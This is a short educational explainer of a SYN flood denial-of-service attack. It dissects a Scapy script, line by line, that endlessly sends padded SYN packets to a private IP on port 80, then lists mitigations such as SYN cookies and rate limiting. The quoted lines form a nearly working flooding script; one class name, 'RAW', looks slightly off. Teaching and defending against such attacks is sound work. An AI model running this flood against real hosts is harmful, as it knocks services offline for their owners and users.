A SYN flood attack exploits the TCP handshake by sending a succession of SYN requests to a target's system. Each request initializes a connection that the target system must acknowledge, thus consuming resources.
Step-by-Step Explanation
Understanding the Script:
ip = IP("192.168.50.2"): Sets the destination IP address to 192.168.50.2.
tcp = TCP(sport=RandShort(), dport=80, flags="S"): Creates a TCP packet with a random source port, destination port 80, and the SYN flag set.
raw = RAW(b"X"*1024): Adds 1024 bytes of data to the packet.
p = ip/tcp/raw: Combines the IP, TCP, and RAW layers into a single packet.
send(p, loop=1, verbose=0): Sends the packet in an infinite loop without verbose output.
Purpose of SYN Flood:
Resource Exhaustion: By sending numerous SYN requests, the target's connection table fills up, preventing legitimate connections.
Denial of Service: The target system becomes overwhelmed and unable to process further requests, effectively causing a denial of service.
Detection and Mitigation:
Rate Limiting: Implement rate limiting on SYN packets.
SYN Cookies: Use SYN cookies to handle the connection requests without allocating resources immediately.
Firewalls and IDS: Deploy firewalls and Intrusion Detection Systems (IDS) to detect and mitigate SYN flood attacks.
Reference from Pentesting Literature:
SYN flood attacks are a classic example of a denial-of-service attack and are commonly discussed in penetration testing guides and HTB write-ups for understanding network-based attacks.
Reference:
Penetration Testing - A Hands-on Introduction to Hacking
HTB Official Writeups